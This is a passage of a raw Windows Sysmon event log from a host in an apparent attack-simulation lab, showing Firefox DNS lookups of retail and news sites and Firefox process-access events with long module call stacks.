Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 22542200x800000000000000017408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.072{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu-retail-direct.amazon-adsystem.com052.95.118.235;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.071{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon.de0type: 5 aax-eu-retail-direct.amazon-adsystem.com;::ffff:52.95.118.235;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.038{59A5CD1D-945A-6005-3305-00000000A301}7052completion.amazon.co.uk9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.011{59A5CD1D-945A-6005-3305-00000000A301}7052completion.amazon.co.uk052.95.122.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.010{59A5CD1D-945A-6005-3305-00000000A301}7052completion.amazon.co.uk0::ffff:52.95.122.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.754{59A5CD1D-8E56-6005-2E00-00000000A301}246497.99.120.34.in-addr.arpa.0type: 12 97.99.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.745{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.745{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.744{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.692{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.692{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.542{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.489{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.489{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.905{59A5CD1D-945A-6005-3305-00000000A301}7052cs950197015.wpc.systemcdn.net0152.199.23.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.904{59A5CD1D-945A-6005-3305-00000000A301}7052ir.ebaystatic.com0type: 5 ir.ebaycdn.net;type: 5 cs950.wpc.a45dd.systemcdn.net;type: 5 cs950197015.wpc.systemcdn.net;::ffff:152.199.23.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.902{59A5CD1D-945A-6005-3305-00000000A301}7052e9428.a.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.900{59A5CD1D-945A-6005-3305-00000000A301}7052e9428.a.akamaiedge.net0104.75.89.51;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.899{59A5CD1D-945A-6005-3305-00000000A301}7052www.ebay.com0type: 5 slot9428.ebay.com.edgekey.net;type: 5 e9428.a.akamaiedge.net;::ffff:104.75.89.51;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.807{59A5CD1D-8E56-6005-2E00-00000000A301}2464228.32.239.54.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.807{59A5CD1D-8E56-6005-2E00-00000000A301}246460.118.95.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.572{59A5CD1D-945A-6005-3305-00000000A301}7052unagi.amazon.de0type: 5 unagi-eu.amazon.com;::ffff:54.239.32.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.401{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesspiegel.de02606:4700::6813:9004;2606:4700::6813:ff03;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.400{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesspiegel.de0104.19.144.4;104.19.255.3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.399{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesspiegel.de0::ffff:104.19.255.3;::ffff:104.19.144.4;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.779{59A5CD1D-8E56-6005-2E00-00000000A301}2464235.118.95.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.778{59A5CD1D-8E56-6005-2E00-00000000A301}24648.122.95.52.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.479{59A5CD1D-945A-6005-3305-00000000A301}7052unagi-eu.amazon.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.388{59A5CD1D-945A-6005-3305-00000000A301}7052unagi-eu.amazon.com054.239.32.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.387{59A5CD1D-945A-6005-3305-00000000A301}7052unagi-eu.amazon.com0::ffff:54.239.32.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.150{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon-adsystem.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.149{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon-adsystem.com052.95.118.60;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.148{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon-adsystem.com0::ffff:52.95.118.60;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.115{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu-retail-direct.amazon-adsystem.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.379{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.379{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.364{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.176{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.160{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.160{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 